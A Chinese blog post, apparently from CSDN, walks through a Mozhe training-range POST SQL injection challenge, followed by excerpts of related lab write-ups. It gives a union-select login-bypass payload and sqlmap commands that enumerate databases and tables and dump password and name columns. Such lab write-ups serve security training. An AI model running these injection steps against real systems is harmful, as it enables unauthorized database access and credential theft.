墨者学院(POST注入)

已于 2024-07-21 19:56:22 修改
阅读量453 收藏 8
点赞数 9
分类专栏: 网络安全 kali 数据库 文章标签: 安全 sql
于 2024-05-19 18:10:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77578012/article/details/139046021
版权
网络安全 同时被 3 个专栏收录
17 篇文章 0 订阅
订阅专栏
kali
3 篇文章 0 订阅
订阅专栏
数据库
2 篇文章 1 订阅
订阅专栏

题记:今天本来打算在mozhe找个POST注入练练手工注入,结果直接爆出来了(汗颜),真实浪费了我的3个币(啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊,你还我!!!!!!!!)

所以本着买都买了的心,给大家看看sqlmap怎么跑的!

payload:
name=admin' union select 1,2,3 #&password=admin

一、实验准备

1.墨者靶场(POST注入)

2.sqlmap工具(主要)

3.burpsuite工具

(如果大家对工具有需求的话可以q我哈)

二、工具小子闪亮登场

1.查询注入点

第一种:使用数据包查询

使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具相同目录,在需要测试参数后加*

payload:

Python sqlmap.py -r 1.txt

发现存在注入点,并且给出了我们具体执行的payload格式

第二种:使用POST格式url查询

同时--data参数后所跟数据也可以通过抓包获取

payload:

Python sqlmap.py -u “http://124.70.71.251:41800//login.php” --data “name=admin&password=admin”

2.顺风顺水之路之库名、表名、列名、字段值

(1)查询数据库名

对于第二种方法只需修改对应参数即可所以不在做重复演示

paylaod:python sqlmap.py -r 1.txt --dbs

(2)查询表名

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" --tables

(3)查询列名

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member" --columns

(4)查询字段值

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member"  -C "password,name" --dump --threads=10

注意:此处--threads=10表示线程数为10,最大值!!!

至此完毕!!!!

有任何疑问可以私信

cen难取名
关注
专栏目录
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4298
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3715
妙啊
墨者学院表单暴力破解实训(第1题)-----破解步骤
最新发布
2301_78533452的博客
08-27 514
web安全之暴力破解
记在墨者学院业务逻辑漏洞靶场实战感受
weixin_50146421的博客
06-10 1168
思路:观察第一个页面需要重置171手机号密码,第二个页面中有四个输入表单,未知的是验证码,所以从验证码下手,在一个看说明,即188手机号已经注册,也就是188可以收到验证码,那么可不可以直接用188手机号获取到验证码,然后用来给171重置密码呢?思路:可以观察余额为1,书的价格超出预算,可以拿bp抓包,然后修改书的价格,达成0元购买,观察bi11和bi22参数分别为10 20 ,对应书的价格,将其改为0,然后放行数据包 即可找到key。防止在登录页面,注册页面,密码修改页面等出现逻辑错误。
墨者学院—网络安全篇1
博客
09-16 294
题目目录某防火墙默认口令浏览器信息伪造 某防火墙默认口令 背景介绍 安全工程师"墨者"对某公司进行授权测试时,扫描公网IP时发现当前公司在网络边界部署了某型号防火墙,并且公网可以访问防火墙的WEB页面。 实训目标 1、掌握查看当前设备类型的方法; 2、了解网络(安全)设备的登录控制方式; 3、了解网络(安全)设备的默认口令获取方式; 4、了解当前型号防火墙的不同账户的区别; 5、了解在网络信息安全中的权限最小化、权限分离作用; 解题方向 找到防火墙的默认口令进行登录。 解题思路 开启靶场环境 查看源代码
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
多崎巡礼的博客
08-20 3372
postgreSQL注入和mysql注入语法是类似的,有一点小的差异: postgreSQL查询当前数据库使用:current_database()函数; 在pg_stat_user_tables库查询表名,使用relname关键字; 和MySQL的limit使用有差异,语法为limit 1 offset 0。     手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者未必黑.pdf
12-26
不过,既然您提到了标题为“近墨者未必黑”,这是一个常用的成语,其含义是指周围环境或周围的人对一个人的影响并不是绝对的,一个人不一定因为接触了不良环境或不好的人就一定会变得不好。这个成语强调的是个人的...
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 731
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
m0_66835614的博客
11-28 1334
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
墨者学院靶场自动解题
qq_55733466的博客
09-07 531
本文演示了python程序自动进行靶场解题的效果。
墨者学院(4个sql靶场攻略)
a96482的博客
07-23 1425
首先我们要购买并启动靶场点击访问跳转页面,获得KEY后在这里提交该题提示POST方式提交,我们需要通过burpsuite抓包在name后加单引号测试发现有sql注入,那我们就按照sql手工注入流程来这里发现联合注入(name='1 union select 1,2,3 #)直接得出KEY最后提交KEY完成。
墨者学院—网络安全篇3
博客
09-17 1689
文章目录投票常见漏洞分析溯源标题 投票常见漏洞分析溯源 背景介绍 小墨在微信群里面收到一个关于“家乡美”最美乡村评选微信投票,小墨想让自己的家乡成为第一名 实训目标 1、User-Agent的理解 2、X-Forwarded-for的理解 3、使用BurpSuite工具修改内容 解题方向 根据页面提示,进行投票测试 解题步骤 首先开启靶场环境 点击进入微信投票,根据提示 我们需要把a2019的票数刷到第一名 提示要用微信打开 我们使用浏览器信息伪造 标题 ...
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 477
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,攻击者通过不断尝试不同的条件,观察页面返回的结果来推断出数据库的信息。攻击者可以使用布尔逻辑运算符(如AND、OR)和条件语句(如等于、小于、大于等)来构造恶意的SQL查询。 为了防止SQL注入布尔攻击,开发人员应该采取以下预防措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只接受合法的输入。 2. 参数化查询:使用参数化查询或预编译语句来构建SQL查询,这样可以将用户输入作为参数传递给查询,而不是直接拼接在SQL语句中。 3. 最小权限原则:为数据库用户分配最小权限,避免给予不必要的数据库操作权限。 4. 错误消息保护:在生产环境中,不要将详细的错误消息返回给用户,以免泄露敏感信息。 希望这能帮到你!如果有任何其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值